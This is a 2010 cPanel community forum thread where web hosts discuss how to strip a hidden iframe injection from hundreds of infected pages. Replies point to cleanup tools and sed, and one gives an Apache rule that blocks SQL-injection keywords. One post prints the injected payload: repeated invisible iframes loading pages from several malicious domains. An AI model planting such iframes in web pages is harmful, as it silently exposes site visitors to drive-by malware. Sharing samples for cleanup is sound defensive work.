The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

How can you remove the iframe hack server wide?

Discussion in 'Security' started by DWHS.net, Jan 12, 2010.

  1. DWHS.net

    DWHS.net Well-Known Member
    PartnerNOC

    Joined:
    Jul 28, 2002
    Messages:
    1,569
    Likes Received:
    6
    Trophy Points:
    38
    Location:
    LA, Costa RIca
    cPanel Access Level:
    Root Administrator
    I have a domain with hundreds of pages infected with the iframe hack. I need a find and replace command to remove them all.

    Anyone know of I can possibly do this?

    I tried all the suggestions on this forum and none have worked. I had simple script years ago but I can't find it unfortunately anymore.

    Thanks
     
  2. javiercampos

    javiercampos Well-Known Member
    PartnerNOC

    Joined:
    Jan 12, 2010
    Messages:
    48
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    /tmp
    cPanel Access Level:
    Root Administrator
    hi
    everything good writing is translated by google hehe, since I'm from chile and handling not much English but I want to help.

    looks good would recommend you first remove the general iframe mind are embedded in the index when you delete, change the access codes and install this application

    Installation » Anti-Gumblar
     
  3. Data 1

    Data 1 Well-Known Member

    Joined:
    May 25, 2008
    Messages:
    113
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Columbus Ohio
    cPanel Access Level:
    DataCenter Provider

    Depends on the hack. I have a file I found on the internet that cleans GNU-GPL and others with a few text changes, but to get it to work I have to make all the files writable. What I have been doing is making everything writable, running the fix file, download the directory to my computer (doubles as a virus checker also), deleting the files on the server and re uploading to reset permissions. I know it's a kludge but it has been working great. You will have to e-mail me for the file unless management don't mind me posting it here.
     
  4. ModServ

    ModServ Well-Known Member

    Joined:
    Oct 17, 2006
    Messages:
    332
    Likes Received:
    5
    Trophy Points:
    18
    Location:
    Egypt
    cPanel Access Level:
    Root Administrator
    I tried this in httpd.conf but don't know if its working good or now

    Code:
    RewriteCond %{QUERY_STRING}    ^.*(;|<|>|'|"|\)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/\*|union|select|insert|cast|set|declare|drop|update|md5|benchmark).* [NC]
    RewriteRule .* - [F]
    But after that I didn't suffer from iframe.
     
  5. thewebhosting

    thewebhosting Well-Known Member

    Joined:
    May 9, 2008
    Messages:
    1,201
    Likes Received:
    1
    Trophy Points:
    38
    Kindly check the below mentioned URL which might helps you to solve your issue:

    How I used the Unix command line to do a multi-file search and replace to fix over 4,700 individual files - Gabriel - Web Design, Development and Business … infopoet
     
  6. DWHS.net

    DWHS.net Well-Known Member
    PartnerNOC

    Joined:
    Jul 28, 2002
    Messages:
    1,569
    Likes Received:
    6
    Trophy Points:
    38
    Location:
    LA, Costa RIca
    cPanel Access Level:
    Root Administrator
    I did this but I don't know what do after it's installed. How do I run it to remove the thousands of pages infected?

    Or is this just to prevent it?

    Also here is the code of this helps:

    <iframe src=\"http://odmarco.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://odmarco.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://odile-marco.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://odile-marco.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://odile-marco.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://odile-marco.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://fuadrenal.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://fuadrenal.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://reycross.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://reycross.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://davtraff.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://davtraff.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://odile-marco.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://odile-marco.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://odile-marco.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=\"http://odile-marco.com/lib/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
     
    #6 DWHS.net, Feb 9, 2010
    Last edited: Feb 9, 2010
  7. rnawky

    rnawky Member

    Joined:
    Jan 13, 2010
    Messages:
    20
    Likes Received:
    0
    Trophy Points:
    1
    Try using the sed command combined with find and xargs.

    Find and Replace with Sed
     
  8. semoweb

    semoweb Registered

    Joined:
    Feb 12, 2010
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    1
    Not sure im afraid you might have to remove the iframe manually :-(
     
  9. neonix

    neonix Well-Known Member

    Joined:
    Oct 21, 2004
    Messages:
    124
    Likes Received:
    2
    Trophy Points:
    0
Loading...

Share This Page